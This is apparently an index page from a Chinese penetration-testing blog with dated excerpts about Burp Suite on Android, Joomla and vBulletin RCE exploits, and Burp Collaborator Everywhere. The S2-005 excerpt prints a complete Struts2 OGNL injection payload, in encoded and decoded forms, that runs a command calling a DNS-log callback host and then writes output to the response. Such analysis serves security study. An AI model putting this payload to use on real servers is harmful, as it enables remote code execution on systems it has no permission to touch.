October 16, 2019
Android 9.0 Burp Suite 抓包配置
October 14, 2019
Rusty joomla rce 3.0.0 – 3.4.6
September 27, 2019
S2-005 payload 分析 原始 payload (%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22))) &(asdf)((‘%5cu0023rt.exec(%22ping@-c@3@ijtrsivzwnreezte.send.jiance.qianxin.com%22.split(%22@%22))’)(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1 URLDecode (‘\u0023_memberAccess[\’allowStaticMethodAccess\’]’)(vaaa)=true&(aaaa)((‘\u0023context[\’xwork.MethodAccessor.denyMethodExecution\’]\u003d\u0023vccc’)(\u0023vccc\u003dnew java.lang.Boolean("false")))&(asdf)((‘\u0023rt.exec("ping@-c@3@ijtrsivzwnreezte.dnslog.com".split("@"))’)(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1 Unicode string escape (‘#_memberAccess[\’allowStaticMethodAccess\’]’)(vaaa)=true& (aaaa)( (‘#context[\’xwork.MethodAccessor.denyMethodExecution\’]=#vccc’) (#vccc=new java.lang.Boolean("false")) )& (asdf)( (‘#rt.exec("ping@-c@3@ijtrsivzwnreezte.dnslog.com".split("@"))’) (#rt=@java.lang.Runtime@getRuntime()) )=1 开始修改 (‘\u0023_memberAccess[\’allowStaticMethodAccess\’]’)(vaaa)=true& (aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))& (aabb)( (‘#outstr.close()’) (‘#outstr.print("888888")’) (‘#outstr.println("webpath")’) (‘#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()’) ) 修改状态2 (%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(aabb)((‘\u0023outstr.close()’)(‘\u0023outstr.print("888888")’)(‘\u0023outstr.println("webpath")’)(‘\u0023outstr\u003d@org.apache.struts2.ServletActionContext@getResponse().getWriter()’))=1
September 27, 2019
如何使用 Collaborator Everywhere <!–more–> 使用方法 https://github.com/PortSwigger/collaborator-everywhere 注意,要现在 scope 中设置范围, collaborator-everywhere 之后才会工作,且只对范围内的请求,修改/添加 HTTP 请求头。 捕获到的请求 GET /wp-content/uploads/2018/05/138-140FP91001-1024×640.jpg HTTP/1.1 Host: wp.blkstone.me User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@hvgwzou2c52d11kl8cd4nr16yx4r8fx.burpcollaborator.net Accept: image/webp,*/* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://3gkikafoxrnzmn57tyyq8dmsjjpdn1c.burpcollaborator.net/ref If-Modified-Since: Sat, 19 May 2018 09:49:59 GMT If-None-Match: "19f18-56c8bfdde1fc0" Cache-Control: no-transform X-Wap-Profile: […]
September 25, 2019
渗透测试之业务流量通用抓包方法及自动化漏洞扫描 <!–more–> 正文 https://mp.weixin.qq.com/s/vBo6GXQLW2Oo0nq1DVzSuw
September 25, 2019
CVE-2019-16759 vBulletin 5.x pre-auth RCE exploit <!–more–> 参考资料 vBulletin 5.x 0day pre-auth RCE exploit https://seclists.org/fulldisclosure/2019/Sep/31 vBulletin 5.x 前台代码执行漏洞分析 -【CVE-2019-16759】 https://xz.aliyun.com/t/6419 vBulletin zero-day exploited in the wild in wake of exploit release https://www.helpnetsecurity.com/2019/09/25/cve-2019-16759/ 环境搭建 (复杂) https://github.com/asosso/docker-vbulletin # 先确认编译工具链足够齐全 yum -y install gcc install autoconf automake libtool # 之后安装 php 扩展依赖 yum install -y php php-mysql php-curl […]